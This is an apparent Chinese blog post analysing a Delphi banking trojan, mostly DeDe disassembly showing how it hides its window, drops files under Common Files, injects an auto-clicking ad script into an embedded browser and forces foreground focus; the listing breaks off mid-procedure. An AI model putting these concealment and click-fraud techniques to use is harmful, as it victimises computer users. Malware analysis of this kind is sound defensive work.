Trojan-Banker.Win32.Banker (2)

现在的位置: 首页 > 综合 > 正文

RSS

Trojan-Banker.Win32.Banker (2)

2013年06月18日 ⁄ 综合 ⁄ 共 35877字 ⁄ 字号小中大 ⁄ 评论关闭

使用spy对木马进程监视，发现不停地WM_TIMER消息,估计木马使用定时器监控ie的启动情况

木马使用delphi编写.

先使用ollydbg反编译Coilk.exe,发现

代码中有{985483CD-DCDE-4817-AF35-F17411836625}google,发现是Trojan-Banker病毒

代码中有TInterfacedObject，baidu,发现是delhpi类

再下载DeDe反编译，代码如下

Xaze.dll

unit Uqwt;

interface

uses
Windows, Messages, SysUtils, Classes, Graphics,
Controls, Forms, Dialogs, StdCtrls
type
Tfrm_SSMoon=class(TForm)
ti_ZipMemory: TTimer;
Panel1: TPanel;
Webb1: TWebBrowser;
IdHTTP: TIdHTTP;
Webb: TWebBrowser;
webb2: TWebBrowser;
RzColorPicker1: TRzColorPicker;
GroupBox1: TGroupBox;
Edit1: TEdit;
Memo1: TMemo;
procedure FormCreate(Sender : TObject);
procedure WebbDocumentComplete(Sender : TObject);
procedure FormClose(Sender : TObject);
procedure FormActivate(Sender : TObject);
procedure ti_ZipMemoryTimer(Sender : TObject);
procedure webb2DocumentComplete(Sender : TObject);
procedure webb2NewWindow2(Sender : TObject);
procedure WebbNewWindow2(Sender : TObject);
procedure _PROC_004BA92A(Sender : TObject);
procedure _PROC_004BA961(Sender : TObject);
procedure _PROC_004BAA38(Sender : TObject);
procedure _PROC_004BAA95(Sender : TObject);
procedure _PROC_004BACE1(Sender : TObject);
procedure _PROC_004BAD08(Sender : TObject);
procedure _PROC_004BAD51(Sender : TObject);
procedure _PROC_004BB33D(Sender : TObject);
procedure _PROC_004BB5A5(Sender : TObject);
procedure _PROC_004BB800(Sender : TObject);
procedure _PROC_004BBD09(Sender : TObject);
procedure _PROC_004BBDE4(Sender : TObject);
procedure _PROC_004BC071(Sender : TObject);
procedure _PROC_004BC5C5(Sender : TObject);
procedure _PROC_004BC843(Sender : TObject);
procedure _PROC_004BC859(Sender : TObject);
procedure _PROC_004BCA70(Sender : TObject);
procedure _PROC_004BCE8D(Sender : TObject);
procedure _PROC_004BCF10(Sender : TObject);
procedure _PROC_004BD43C(Sender : TObject);
procedure _PROC_004BD598(Sender : TObject);
procedure _PROC_004BD60F(Sender : TObject);
procedure _PROC_004BD618(Sender : TObject);
private
{ Private declarations }
public
{ Public declarations }
end ;

var
frm_SSMoon: Tfrm_SSMoon;

implementation

{$R *.DFM}

procedure Tfrm_SSMoon.FormCreate(Sender : TObject);
begin
(*
004BBE20 55 push ebp
004BBE21 8BEC mov ebp, esp
004BBE23 33C9 xor ecx, ecx
004BBE25 51 push ecx
004BBE26 51 push ecx
004BBE27 51 push ecx
004BBE28 51 push ecx
004BBE29 51 push ecx
004BBE2A 51 push ecx
004BBE2B 51 push ecx
004BBE2C 51 push ecx
004BBE2D 53 push ebx
004BBE2E 56 push esi
004BBE2F 8BD8 mov ebx, eax
004BBE31 33C0 xor eax, eax
004BBE33 55 push ebp

* Possible String Reference to: '檠岕腚^[嬪]?
|
004BBE34 6806C04B00 push $004BC006

***** TRY
|
004BBE39 64FF30 push dword ptr fs:[eax]
004BBE3C 648920 mov fs:[eax], esp
004BBE3F 6AEC push $EC
004BBE41 8BC3 mov eax, ebx

|
004BBE43 E8583BF9FF call 0044F9A0
004BBE48 50 push eax

* Reference to: user32.GetWindowLongA()
|
004BBE49 E802C5F4FF call 00408350
004BBE4E 8BF0 mov esi, eax
004BBE50 81CE00000800 or esi, $00080000
004BBE56 81CE80000000 or esi, $00000080
004BBE5C 56 push esi
004BBE5D 6AEC push $EC
004BBE5F 8BC3 mov eax, ebx

|
004BBE61 E83A3BF9FF call 0044F9A0
004BBE66 50 push eax

* Reference to: user32.SetWindowLongA()
|
004BBE67 E834C7F4FF call 004085A0
004BBE6C 6A02 push $02
004BBE6E 6A03 push $03
004BBE70 6A00 push $00
004BBE72 8BC3 mov eax, ebx

|
004BBE74 E8273BF9FF call 0044F9A0
004BBE79 50 push eax
004BBE7A A12C654C00 mov eax, dword ptr [$004C652C]
004BBE7F 8B00 mov eax, [eax]
004BBE81 FFD0 call eax
004BBE83 8D45FC lea eax, [ebp-$04]

* Reference to : TWebBrowser._PROC_004704D0()
|
004BBE86 E84546FBFF call 004704D0
004BBE8B 8B1568624C00 mov edx, [$004C6268]
004BBE91 8802 mov [edx], al
004BBE93 C60578DD4C0000 mov byte ptr [$004CDD78], $00
004BBE9A C60579DD4C0000 mov byte ptr [$004CDD79], $00
004BBEA1 8D45FC lea eax, [ebp-$04]
004BBEA4 50 push eax
004BBEA5 8D55F4 lea edx, [ebp-$0C]
004BBEA8 33C0 xor eax, eax

|
004BBEAA E8CD74F4FF call 0040337C
004BBEAF 8B45F4 mov eax, [ebp-$0C]
004BBEB2 8D55F8 lea edx, [ebp-$08]

|
004BBEB5 E876EAF4FF call 0040A930
004BBEBA 8B45F8 mov eax, [ebp-$08]
004BBEBD B903000000 mov ecx, $00000003
004BBEC2 BA01000000 mov edx, $00000001

|
004BBEC7 E8209BF4FF call 004059EC
004BBECC A168624C00 mov eax, dword ptr [$004C6268]
004BBED1 803806 cmp byte ptr [eax], $06
004BBED4 740A jz 004BBEE0
004BBED6 A168624C00 mov eax, dword ptr [$004C6268]
004BBEDB 803807 cmp byte ptr [eax], $07
004BBEDE 7527 jnz 004BBF07
004BBEE0 8D45EC lea eax, [ebp-$14]

* Reference to : TWebBrowser._PROC_00470A04()
|
004BBEE3 E81C4BFBFF call 00470A04
004BBEE8 8B45EC mov eax, [ebp-$14]
004BBEEB 8D55F0 lea edx, [ebp-$10]

|
004BBEEE E83DEAF4FF call 0040A930
004BBEF3 8B55F0 mov edx, [ebp-$10]
004BBEF6 A148624C00 mov eax, dword ptr [$004C6248]

* Possible String Reference to: 'MSPat.XML'
|
004BBEFB B91CC04B00 mov ecx, $004BC01C

|
004BBF00 E80799F4FF call 0040580C
004BBF05 EB1C jmp 004BBF23
004BBF07 FF75FC push dword ptr [ebp-$04]

* Possible String Reference to: 'Program Files\Common Files\System\O
| le DB\'
|
004BBF0A 6830C04B00 push $004BC030

* Possible String Reference to: 'MSPat.XML'
|
004BBF0F 681CC04B00 push $004BC01C
004BBF14 A148624C00 mov eax, dword ptr [$004C6248]
004BBF19 BA03000000 mov edx, $00000003

|
004BBF1E E86599F4FF call 00405888
004BBF23 A168624C00 mov eax, dword ptr [$004C6268]
004BBF28 803806 cmp byte ptr [eax], $06
004BBF2B 740A jz 004BBF37
004BBF2D A168624C00 mov eax, dword ptr [$004C6268]
004BBF32 803807 cmp byte ptr [eax], $07
004BBF35 7527 jnz 004BBF5E
004BBF37 8D45E4 lea eax, [ebp-$1C]

* Reference to : TWebBrowser._PROC_00470A04()
|
004BBF3A E8C54AFBFF call 00470A04
004BBF3F 8B45E4 mov eax, [ebp-$1C]
004BBF42 8D55E8 lea edx, [ebp-$18]

|
004BBF45 E8E6E9F4FF call 0040A930
004BBF4A 8B55E8 mov edx, [ebp-$18]
004BBF4D A1D8644C00 mov eax, dword ptr [$004C64D8]

* Possible String Reference to: 'msadotb.htm'
|
004BBF52 B964C04B00 mov ecx, $004BC064

|
004BBF57 E8B098F4FF call 0040580C
004BBF5C EB24 jmp 004BBF82
004BBF5E 8D45E0 lea eax, [ebp-$20]

* Reference to : TWebBrowser._PROC_004709B0()
|
004BBF61 E84A4AFBFF call 004709B0
004BBF66 FF75E0 push dword ptr [ebp-$20]

* Possible String Reference to: 'Program Files\Common Files\System\O
| le DB\'
|
004BBF69 6830C04B00 push $004BC030

* Possible String Reference to: 'msadotb.htm'
|
004BBF6E 6864C04B00 push $004BC064
004BBF73 A1D8644C00 mov eax, dword ptr [$004C64D8]
004BBF78 BA03000000 mov edx, $00000003

|
004BBF7D E80699F4FF call 00405888
004BBF82 A148624C00 mov eax, dword ptr [$004C6248]
004BBF87 8B00 mov eax, [eax]
004BBF89 33D2 xor edx, edx

|
004BBF8B E8E0FBFEFF call 004ABB70

* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BBF90 898388030000 mov [ebx+$0388], eax
004BBF96 8BC3 mov eax, ebx

|
004BBF98 E8D3000000 call 004BC070
004BBF9D 8BC3 mov eax, ebx

* Reference to : Tfrm_SSMoon._PROC_004BCA70()
|
004BBF9F E8CC0A0000 call 004BCA70
004BBFA4 B201 mov dl, $01

* Reference to class TStringList
|
004BBFA6 A1A8AA4100 mov eax, dword ptr [$0041AAA8]

|
004BBFAB E86885F4FF call 00404518

* Reference to field Tfrm_SSMoon.OFFS_038C
|
004BBFB0 89838C030000 mov [ebx+$038C], eax
004BBFB6 B201 mov dl, $01

* Reference to class TStringList
|
004BBFB8 A1A8AA4100 mov eax, dword ptr [$0041AAA8]

|
004BBFBD E85685F4FF call 00404518

* Reference to field Tfrm_SSMoon.OFFS_0390
|
004BBFC2 898390030000 mov [ebx+$0390], eax
004BBFC8 8BC3 mov eax, ebx

|
004BBFCA E8D139F9FF call 0044F9A0
004BBFCF 8BC8 mov ecx, eax
004BBFD1 B201 mov dl, $01

* Reference to class TConntecInternetThread
|
004BBFD3 A1141C4700 mov eax, dword ptr [$00471C14]

|
004BBFD8 E8A35CFBFF call 00471C80

* Reference to field Tfrm_SSMoon.OFFS_0394
|
004BBFDD 898394030000 mov [ebx+$0394], eax
004BBFE3 A158674C00 mov eax, dword ptr [$004C6758]
004BBFE8 C60000 mov byte ptr [eax], $00
004BBFEB 33C0 xor eax, eax
004BBFED 5A pop edx
004BBFEE 59 pop ecx
004BBFEF 59 pop ecx
004BBFF0 648910 mov fs:[eax], edx

****** FINALLY
|

* Possible String Reference to: '^[嬪]?
|
004BBFF3 680DC04B00 push $004BC00D
004BBFF8 8D45E0 lea eax, [ebp-$20]
004BBFFB BA08000000 mov edx, $00000008

|
004BC000 E81395F4FF call 00405518
004BC005 C3 ret

|
004BC006 E9D18CF4FF jmp 00404CDC
004BC00B EBEB jmp 004BBFF8

****** END
|
004BC00D 5E pop esi
004BC00E 5B pop ebx
004BC00F 8BE5 mov esp, ebp
004BC011 5D pop ebp
004BC012 C3 ret

*)
end;

procedure Tfrm_SSMoon.WebbDocumentComplete(Sender : TObject);
begin
(*
004BC668 55 push ebp
004BC669 8BEC mov ebp, esp
004BC66B 6A00 push $00
004BC66D 6A00 push $00
004BC66F 6A00 push $00
004BC671 6A00 push $00
004BC673 6A00 push $00
004BC675 6A00 push $00
004BC677 6A00 push $00
004BC679 53 push ebx
004BC67A 56 push esi
004BC67B 8BF1 mov esi, ecx
004BC67D 8BD8 mov ebx, eax
004BC67F 33C0 xor eax, eax
004BC681 55 push ebp
004BC682 6834C84B00 push $004BC834

***** TRY
|
004BC687 64FF30 push dword ptr fs:[eax]
004BC68A 648920 mov fs:[eax], esp
004BC68D 803D78DD4C0000 cmp byte ptr [$004CDD78], $00
004BC694 0F8564010000 jnz 004BC7FE
004BC69A 8D55F4 lea edx, [ebp-$0C]

* Reference to control Tfrm_SSMoon.Webb : TWebBrowser
|
004BC69D 8B8370030000 mov eax, [ebx+$0370]

* Reference to : TWebBrowser._PROC_00470444()
|
004BC6A3 E89C3DFBFF call 00470444
004BC6A8 3B75F4 cmp esi, [ebp-$0C]
004BC6AB 0F854D010000 jnz 004BC7FE
004BC6B1 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BC6B6 83B88803000000 cmp dword ptr [eax+$0388], +$00
004BC6BD 0F843B010000 jz 004BC7FE
004BC6C3 C60578DD4C0001 mov byte ptr [$004CDD78], $01
004BC6CA 8D4DF0 lea ecx, [ebp-$10]

* Reference to control Tfrm_SSMoon.Webb : TWebBrowser
|
004BC6CD 8B8370030000 mov eax, [ebx+$0370]
004BC6D3 BACB000000 mov edx, $000000CB

* Reference to : TOleControl._PROC_0046CE4C()
|
004BC6D8 E86F07FBFF call 0046CE4C
004BC6DD 8B55F0 mov edx, [ebp-$10]
004BC6E0 B860DD4C00 mov eax, $004CDD60
004BC6E5 B944C84B00 mov ecx, $004BC844

|
004BC6EA E891ABF4FF call 00407280
004BC6EF 8D45EC lea eax, [ebp-$14]

|
004BC6F2 E845ABF4FF call 0040723C
004BC6F7 50 push eax
004BC6F8 A160DD4C00 mov eax, dword ptr [$004CDD60]
004BC6FD 50 push eax
004BC6FE 8B00 mov eax, [eax]
004BC700 FF90B0010000 call dword ptr [eax+$01B0]

|
004BC706 E841ACF4FF call 0040734C
004BC70B 8B55EC mov edx, [ebp-$14]
004BC70E B864DD4C00 mov eax, $004CDD64
004BC713 B954C84B00 mov ecx, $004BC854

|
004BC718 E863ABF4FF call 00407280
004BC71D B201 mov dl, $01

* Reference to class TMemoryStream
|
004BC71F A1ACAD4100 mov eax, dword ptr [$0041ADAC]

|
004BC724 E8EF7DF4FF call 00404518
004BC729 8945F8 mov [ebp-$08], eax
004BC72C B201 mov dl, $01

* Reference to class TStringList
|
004BC72E A1A8AA4100 mov eax, dword ptr [$0041AAA8]

|
004BC733 E8E07DF4FF call 00404518
004BC738 8945FC mov [ebp-$04], eax
004BC73B 33C0 xor eax, eax
004BC73D 55 push ebp
004BC73E 68F7C74B00 push $004BC7F7

***** TRY
|
004BC743 64FF30 push dword ptr fs:[eax]
004BC746 648920 mov fs:[eax], esp

* Possible String Reference to: '<html><body><a id="adid" href="#" t
| arget="_blank"></a>'
|
004BC749 BA6CC84B00 mov edx, $004BC86C
004BC74E 8B45FC mov eax, [ebp-$04]
004BC751 8B08 mov ecx, [eax]

* Possible reference to virtual method TStringList.OFFS_38
|
004BC753 FF5138 call dword ptr [ecx+$38]

* Possible String Reference to: '<script language="javascript">'
|
004BC756 BAACC84B00 mov edx, $004BC8AC
004BC75B 8B45FC mov eax, [ebp-$04]
004BC75E 8B08 mov ecx, [eax]

* Possible reference to virtual method TStringList.OFFS_38
|
004BC760 FF5138 call dword ptr [ecx+$38]

* Possible String Reference to: 'function ClickAD(adcode){lnk = docu
| ment.getElementById("adid"); if(lnk
| !=null){lnk.href=adcode;lnk.click()
| ;}}'
|
004BC763 BAD4C84B00 mov edx, $004BC8D4
004BC768 8B45FC mov eax, [ebp-$04]
004BC76B 8B08 mov ecx, [eax]

* Possible reference to virtual method TStringList.OFFS_38
|
004BC76D FF5138 call dword ptr [ecx+$38]

* Possible String Reference to: '</Script></body></html>'
|
004BC770 BA4CC94B00 mov edx, $004BC94C
004BC775 8B45FC mov eax, [ebp-$04]
004BC778 8B08 mov ecx, [eax]

* Possible reference to virtual method TStringList.OFFS_38
|
004BC77A FF5138 call dword ptr [ecx+$38]
004BC77D 8B55F8 mov edx, [ebp-$08]
004BC780 8B45FC mov eax, [ebp-$04]
004BC783 8B08 mov ecx, [eax]

* Possible reference to virtual method TStringList.OFFS_78
|
004BC785 FF5178 call dword ptr [ecx+$78]
004BC788 6A00 push $00
004BC78A 6A00 push $00
004BC78C 8B45F8 mov eax, [ebp-$08]

|
004BC78F E8842EF6FF call 0041F618
004BC794 6A00 push $00
004BC796 8B4DF8 mov ecx, [ebp-$08]
004BC799 B201 mov dl, $01

* Reference to class TStreamAdapter
|
004BC79B A13CB04100 mov eax, dword ptr [$0041B03C]

|
004BC7A0 E80B82F6FF call 004249B0
004BC7A5 85C0 test eax, eax
004BC7A7 7403 jz 004BC7AC
004BC7A9 83E8EC sub eax, -$14
004BC7AC 50 push eax
004BC7AD 8D4DE4 lea ecx, [ebp-$1C]

* Reference to control Tfrm_SSMoon.Webb : TWebBrowser
|
004BC7B0 8B8370030000 mov eax, [ebx+$0370]
004BC7B6 BACB000000 mov edx, $000000CB

* Reference to : TOleControl._PROC_0046CE4C()
|
004BC7BB E88C06FBFF call 0046CE4C
004BC7C0 8B55E4 mov edx, [ebp-$1C]
004BC7C3 8D45E8 lea eax, [ebp-$18]
004BC7C6 B964C94B00 mov ecx, $004BC964

|
004BC7CB E8B0AAF4FF call 00407280
004BC7D0 8B45E8 mov eax, [ebp-$18]
004BC7D3 50 push eax
004BC7D4 8B00 mov eax, [eax]
004BC7D6 FF5014 call dword ptr [eax+$14]
004BC7D9 33C0 xor eax, eax
004BC7DB 5A pop edx
004BC7DC 59 pop ecx
004BC7DD 59 pop ecx
004BC7DE 648910 mov fs:[eax], edx

****** FINALLY
|
004BC7E1 68FEC74B00 push $004BC7FE
004BC7E6 8B45F8 mov eax, [ebp-$08]

|
004BC7E9 E85A7DF4FF call 00404548
004BC7EE 8B45FC mov eax, [ebp-$04]

|
004BC7F1 E8527DF4FF call 00404548
004BC7F6 C3 ret

|
004BC7F7 E9E084F4FF jmp 00404CDC
004BC7FC EBE8 jmp 004BC7E6

****** END
|
004BC7FE 33C0 xor eax, eax
004BC800 5A pop edx
004BC801 59 pop ecx
004BC802 59 pop ecx
004BC803 648910 mov fs:[eax], edx

****** FINALLY
|
004BC806 683BC84B00 push $004BC83B
004BC80B 8D45E4 lea eax, [ebp-$1C]

|
004BC80E E829AAF4FF call 0040723C
004BC813 8D45E8 lea eax, [ebp-$18]

|
004BC816 E821AAF4FF call 0040723C
004BC81B 8D45EC lea eax, [ebp-$14]

|
004BC81E E819AAF4FF call 0040723C
004BC823 8D45F0 lea eax, [ebp-$10]

|
004BC826 E811AAF4FF call 0040723C
004BC82B 8D45F4 lea eax, [ebp-$0C]

|
004BC82E E809AAF4FF call 0040723C
004BC833 C3 ret

|
004BC834 E9A384F4FF jmp 00404CDC
004BC839 EBD0 jmp 004BC80B

****** END
|
004BC83B 5E pop esi
004BC83C 5B pop ebx
004BC83D 8BE5 mov esp, ebp
004BC83F 5D pop ebp
004BC840 C20400 ret $0004

*)
end;

procedure Tfrm_SSMoon.FormClose(Sender : TObject);
begin
(*
004BCA40 53 push ebx
004BCA41 8BD8 mov ebx, eax
004BCA43 C60102 mov byte ptr [ecx], $02

* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BCA46 8B8388030000 mov eax, [ebx+$0388]

|
004BCA4C E8F77AF4FF call 00404548

* Reference to field Tfrm_SSMoon.OFFS_038C
|
004BCA51 8B838C030000 mov eax, [ebx+$038C]

|
004BCA57 E8EC7AF4FF call 00404548

* Reference to field Tfrm_SSMoon.OFFS_0390
|
004BCA5C 8B8390030000 mov eax, [ebx+$0390]

|
004BCA62 E8E17AF4FF call 00404548
004BCA67 33C0 xor eax, eax

* Reference to GlobalVar_004CDD54
|
004BCA69 A354DD4C00 mov dword ptr [$004CDD54], eax
004BCA6E 5B pop ebx
004BCA6F C3 ret

*)
end;

procedure Tfrm_SSMoon.FormActivate(Sender : TObject);
begin
(*

* Reference to field Tfrm_SSMoon.OFFS_004C
|
004BD1AC 8B504C mov edx, [eax+$4C]
004BD1AF 8BCA mov ecx, edx
004BD1B1 F7DA neg edx

* Reference to : TGlassFrame._PROC_00463270()
|
004BD1B3 E8B860FAFF call 00463270
004BD1B8 C3 ret

*)
end;

procedure Tfrm_SSMoon.ti_ZipMemoryTimer(Sender : TObject);
begin
(*
004BD1BC 55 push ebp
004BD1BD 8BEC mov ebp, esp
004BD1BF 51 push ecx
004BD1C0 53 push ebx
004BD1C1 56 push esi
004BD1C2 57 push edi
004BD1C3 8945FC mov [ebp-$04], eax
004BD1C6 833D58DD4C0000 cmp dword ptr [$004CDD58], +$00
004BD1CD 7631 jbe 004BD200
004BD1CF 33C0 xor eax, eax
004BD1D1 55 push ebp
004BD1D2 68F6D14B00 push $004BD1F6

***** TRY
|
004BD1D7 64FF30 push dword ptr fs:[eax]
004BD1DA 648920 mov fs:[eax], esp
004BD1DD 6AFF push $FF
004BD1DF 6AFF push $FF
004BD1E1 A158DD4C00 mov eax, dword ptr [$004CDD58]
004BD1E6 50 push eax

* Reference to: kernel32.SetProcessWorkingSetSize()
|
004BD1E7 E8D4ABF4FF call 00407DC0
004BD1EC 33C0 xor eax, eax
004BD1EE 5A pop edx
004BD1EF 59 pop ecx
004BD1F0 59 pop ecx
004BD1F1 648910 mov fs:[eax], edx
004BD1F4 EB0A jmp 004BD200

|
004BD1F6 E92D78F4FF jmp 00404A28

|
004BD1FB E8387CF4FF call 00404E38

****** END
|
004BD200 8B45FC mov eax, [ebp-$04]

* Reference to control Tfrm_SSMoon.ti_ZipMemory : TTimer
|
004BD203 8B8060030000 mov eax, [eax+$0360]
004BD209 BA40771B00 mov edx, $001B7740

* Reference to : TPanel._PROC_00437CDC()
|
004BD20E E8C9AAF7FF call 00437CDC
004BD213 5F pop edi
004BD214 5E pop esi
004BD215 5B pop ebx
004BD216 59 pop ecx
004BD217 5D pop ebp
004BD218 C3 ret

*)
end;

procedure Tfrm_SSMoon.webb2DocumentComplete(Sender : TObject);
begin
(*
004BD21C 55 push ebp
004BD21D 8BEC mov ebp, esp
004BD21F 6A00 push $00
004BD221 6A00 push $00
004BD223 6A00 push $00
004BD225 6A00 push $00
004BD227 6A00 push $00
004BD229 53 push ebx
004BD22A 56 push esi
004BD22B 8BF1 mov esi, ecx
004BD22D 8BD8 mov ebx, eax
004BD22F 33C0 xor eax, eax
004BD231 55 push ebp
004BD232 6844D34B00 push $004BD344

***** TRY
|
004BD237 64FF30 push dword ptr fs:[eax]
004BD23A 648920 mov fs:[eax], esp
004BD23D 803D79DD4C0000 cmp byte ptr [$004CDD79], $00
004BD244 0F85C7000000 jnz 004BD311
004BD24A 8D4DFC lea ecx, [ebp-$04]
004BD24D BAC8000000 mov edx, $000000C8

* Reference to control Tfrm_SSMoon.webb2 : TWebBrowser
|
004BD252 8B8374030000 mov eax, [ebx+$0374]

* Reference to : TOleControl._PROC_0046CE4C()
|
004BD258 E8EFFBFAFF call 0046CE4C
004BD25D 3B75FC cmp esi, [ebp-$04]
004BD260 0F85AB000000 jnz 004BD311
004BD266 C60579DD4C0001 mov byte ptr [$004CDD79], $01
004BD26D B85CDD4C00 mov eax, $004CDD5C

|
004BD272 E8C59FF4FF call 0040723C
004BD277 A154DD4C00 mov eax, dword ptr [$004CDD54]

|
004BD27C E81F27F9FF call 0044F9A0
004BD281 50 push eax

* Reference to: user32.SetForegroundWindow()
|
004BD282 E8C1B2F4FF call 00408548
004BD287 8D45F8 lea eax, [ebp-$08]

|
004BD28A E8AD9FF4FF call 0040723C
004BD28F 50 push eax
004BD290 8D4DF4 lea ecx, [ebp-$0C]
004BD293 A154DD4C00 mov eax, dword ptr [$004CDD54]

* Reference to control webb2 : TWebBrowser
|
004BD298 8B8074030000 mov eax, [eax+$0374]
004BD29E BACB000000 mov edx, $000000CB

* Reference to : TOleControl._PROC_0046CE4C()
|
004BD2A3 E8A4FBFAFF call 0046CE4C
004BD2A8 8B45F4 mov eax, [ebp-$0C]
004BD2AB 50 push eax
004BD2AC 8B00 mov eax, [eax]
004BD2AE FF90B0010000 call dword ptr [eax+$01B0]

|
004BD2B4 E893A0F4FF call 0040734C
004BD2B9 8B45F8 mov eax, [ebp-$08]
004BD2BC 50 push eax
004BD2BD 8B00 mov eax, [eax]
004BD2BF FF90EC000000 call dword ptr [eax+$00EC]

|
004BD2C5 E882A0F4FF call 0040734C

* Possible String Reference to: '{TAB '
|
004BD2CA 685CD34B00 push $004BD35C
004BD2CF 8D55EC lea edx, [ebp-$14]

* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BD2D2 8B8388030000 mov eax, [ebx+$0388]
004BD2D8 8B402C mov eax, [eax+$2C]

|
004BD2DB E82CCFF4FF call 0040A20C
004BD2E0 FF75EC push dword ptr [ebp-$14]
004BD2E3 686CD34B00 push $004BD36C
004BD2E8 8D45F0 lea eax, [ebp-$10]
004BD2EB BA03000000 mov edx, $00000003

|
004BD2F0 E89385F4FF call 00405888
004BD2F5 8B45F0 mov eax, [ebp-$10]

|
004BD2F8 E88786F4FF call 00405984
004BD2FD 33D2 xor edx, edx

|
004BD2FF E8CC0AFFFF call 004ADDD0
004BD304 A160624C00 mov eax, dword ptr [$004C6260]
004BD309 8B00 mov eax, [eax]
004BD30B 50 push eax

* Reference to: user32.SetForegroundWindow()
|
004BD30C E837B2F4FF call 00408548
004BD311 33C0 xor eax, eax
004BD313 5A pop edx
004BD314 59 pop ecx
004BD315 59 pop ecx
004BD316 648910 mov fs:[eax], edx

****** FINALLY
|
004BD319 684BD34B00 push $004BD34B
004BD31E 8D45EC lea eax, [ebp-$14]
004BD321 BA02000000 mov edx, $00000002

|
004BD326 E8ED81F4FF call 00405518
004BD32B 8D45F4 lea eax, [ebp-$0C]

|
004BD32E E8099FF4FF call 0040723C
004BD333 8D45F8 lea eax, [ebp-$08]

|
004BD336 E8019FF4FF call 0040723C
004BD33B 8D45FC lea eax, [ebp-$04]

|
004BD33E E8F99EF4FF call 0040723C
004BD343 C3 ret

|
004BD344 E99379F4FF jmp 00404CDC
004BD349 EBD3 jmp 004BD31E

****** END
|
004BD34B 5E pop esi
004BD34C 5B pop ebx
004BD34D 8BE5 mov esp, ebp
004BD34F 5D pop ebp
004BD350 C20400 ret $0004

*)
end;

procedure Tfrm_SSMoon.webb2NewWindow2(Sender : TObject);
begin
(*
004BD370 55 push ebp
004BD371 8BEC mov ebp, esp
004BD373 6A00 push $00
004BD375 6A00 push $00
004BD377 53 push ebx
004BD378 56 push esi
004BD379 57 push edi
004BD37A 8BF1 mov esi, ecx
004BD37C 8BD8 mov ebx, eax
004BD37E 33C0 xor eax, eax
004BD380 55 push ebp
004BD381 682AD44B00 push $004BD42A

***** TRY
|
004BD386 64FF30 push dword ptr fs:[eax]
004BD389 648920 mov fs:[eax], esp
004BD38C 33C0 xor eax, eax
004BD38E 55 push ebp
004BD38F 68F7D34B00 push $004BD3F7

***** TRY
|
004BD394 64FF30 push dword ptr fs:[eax]
004BD397 648920 mov fs:[eax], esp
004BD39A 833D5CDD4C0000 cmp dword ptr [$004CDD5C], +$00
004BD3A1 7425 jz 004BD3C8
004BD3A3 8D45FC lea eax, [ebp-$04]

|
004BD3A6 E8919EF4FF call 0040723C
004BD3AB 50 push eax
004BD3AC A15CDD4C00 mov eax, dword ptr [$004CDD5C]
004BD3B1 50 push eax
004BD3B2 8B00 mov eax, [eax]
004BD3B4 FF503C call dword ptr [eax+$3C]

|
004BD3B7 E8909FF4FF call 0040734C
004BD3BC 8B55FC mov edx, [ebp-$04]
004BD3BF 8BC6 mov eax, esi

|
004BD3C1 E88E9EF4FF call 00407254
004BD3C6 EB1D jmp 004BD3E5
004BD3C8 8D4DF8 lea ecx, [ebp-$08]

* Reference to control Tfrm_SSMoon.Webb1 : TWebBrowser
|
004BD3CB 8B8368030000 mov eax, [ebx+$0368]
004BD3D1 BAC8000000 mov edx, $000000C8

* Reference to : TOleControl._PROC_0046CE4C()
|
004BD3D6 E871FAFAFF call 0046CE4C
004BD3DB 8B55F8 mov edx, [ebp-$08]
004BD3DE 8BC6 mov eax, esi

|
004BD3E0 E86F9EF4FF call 00407254
004BD3E5 8B4508 mov eax, [ebp+$08]
004BD3E8 66C7000000 mov word ptr [eax], $0000
004BD3ED 33C0 xor eax, eax
004BD3EF 5A pop edx
004BD3F0 59 pop ecx
004BD3F1 59 pop ecx
004BD3F2 648910 mov fs:[eax], edx
004BD3F5 EB12 jmp 004BD409

|
004BD3F7 E92C76F4FF jmp 00404A28
004BD3FC 8B4508 mov eax, [ebp+$08]
004BD3FF 66C700FFFF mov word ptr [eax], $FFFF

|
004BD404 E82F7AF4FF call 00404E38

****** END
|
004BD409 33C0 xor eax, eax
004BD40B 5A pop edx
004BD40C 59 pop ecx
004BD40D 59 pop ecx
004BD40E 648910 mov fs:[eax], edx

****** FINALLY
|
004BD411 6831D44B00 push $004BD431
004BD416 8D45F8 lea eax, [ebp-$08]

* Reference to object IDispatch
|
004BD419 8B15B8114000 mov edx, [$004011B8]
004BD41F B902000000 mov ecx, $00000002

|
004BD424 E80F8DF4FF call 00406138
004BD429 C3 ret

|
004BD42A E9AD78F4FF jmp 00404CDC
004BD42F EBE5 jmp 004BD416

****** END
|
004BD431 5F pop edi
004BD432 5E pop esi
004BD433 5B pop ebx
004BD434 59 pop ecx
004BD435 59 pop ecx
004BD436 5D pop ebp
004BD437 C20400 ret $0004

*)
end;

procedure Tfrm_SSMoon.WebbNewWindow2(Sender : TObject);
begin
(*
004BC974 55 push ebp
004BC975 8BEC mov ebp, esp
004BC977 6A00 push $00
004BC979 6A00 push $00
004BC97B 53 push ebx
004BC97C 56 push esi
004BC97D 57 push edi
004BC97E 8BF1 mov esi, ecx
004BC980 8BD8 mov ebx, eax
004BC982 33C0 xor eax, eax
004BC984 55 push ebp
004BC985 682ECA4B00 push $004BCA2E

***** TRY
|
004BC98A 64FF30 push dword ptr fs:[eax]
004BC98D 648920 mov fs:[eax], esp
004BC990 33C0 xor eax, eax
004BC992 55 push ebp
004BC993 68FBC94B00 push $004BC9FB

***** TRY
|
004BC998 64FF30 push dword ptr fs:[eax]
004BC99B 648920 mov fs:[eax], esp
004BC99E 833D5CDD4C0000 cmp dword ptr [$004CDD5C], +$00
004BC9A5 7425 jz 004BC9CC
004BC9A7 8D45FC lea eax, [ebp-$04]

|
004BC9AA E88DA8F4FF call 0040723C
004BC9AF 50 push eax
004BC9B0 A15CDD4C00 mov eax, dword ptr [$004CDD5C]
004BC9B5 50 push eax
004BC9B6 8B00 mov eax, [eax]
004BC9B8 FF503C call dword ptr [eax+$3C]

|
004BC9BB E88CA9F4FF call 0040734C
004BC9C0 8B55FC mov edx, [ebp-$04]
004BC9C3 8BC6 mov eax, esi

|
004BC9C5 E88AA8F4FF call 00407254
004BC9CA EB1D jmp 004BC9E9
004BC9CC 8D4DF8 lea ecx, [ebp-$08]

* Reference to control Tfrm_SSMoon.Webb1 : TWebBrowser
|
004BC9CF 8B8368030000 mov eax, [ebx+$0368]
004BC9D5 BAC8000000 mov edx, $000000C8

* Reference to : TOleControl._PROC_0046CE4C()
|
